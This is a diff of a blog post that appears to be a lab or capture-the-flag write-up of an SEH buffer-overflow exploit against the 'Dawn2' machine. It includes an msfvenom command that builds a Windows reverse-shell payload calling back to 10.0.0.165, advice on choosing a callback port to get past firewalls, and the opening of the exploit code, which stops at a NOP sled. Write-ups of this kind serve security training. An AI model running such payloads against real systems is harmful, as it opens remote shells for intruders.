TrshPnda/trshpnda.github.io/_posts/Dawn2.md

 ![](https://raw.githubusercontent.com/TrshPnda/trshpnda.github.io/master/images/Dawn2-SEHTHEJUMPS.png)
 ![](https://raw.githubusercontent.com/TrshPnda/trshpnda.github.io/master/images/Dawn2-SEHTOPofThePayload.png)

+Man look at how tight that is =P

 So now that we know we have effectively hijacked the execution flow into a spot where our shellcode can live and I'm fairly confident with my counting skills though I've added a print statement to measure the size of the buffer as well lol.
-Now We can launch the server independently and generate our shellcode via ```msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.165 LPORT=1985 -f py -v SHELL -b "\x00"``` notice how I'm using the same port as the service...
+Now We can launch the server independently and generate our shellcode via ```msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.165 LPORT=1985 -f py -v SHELL -b "\x00"``` notice how I'm using the same port as the service.
 There's a higher chance of recieving a reverseshell back if you use a port that's open on the target system because of things like firewall rules.
-Now obviously this isn't always the case but it's a more logical way of going about things than randomly using any old port.
+Now obviously this isn't always the case but it's a more logical way of going about things than randomly using any port.

 ```
         NOPS = b"\x90" * 20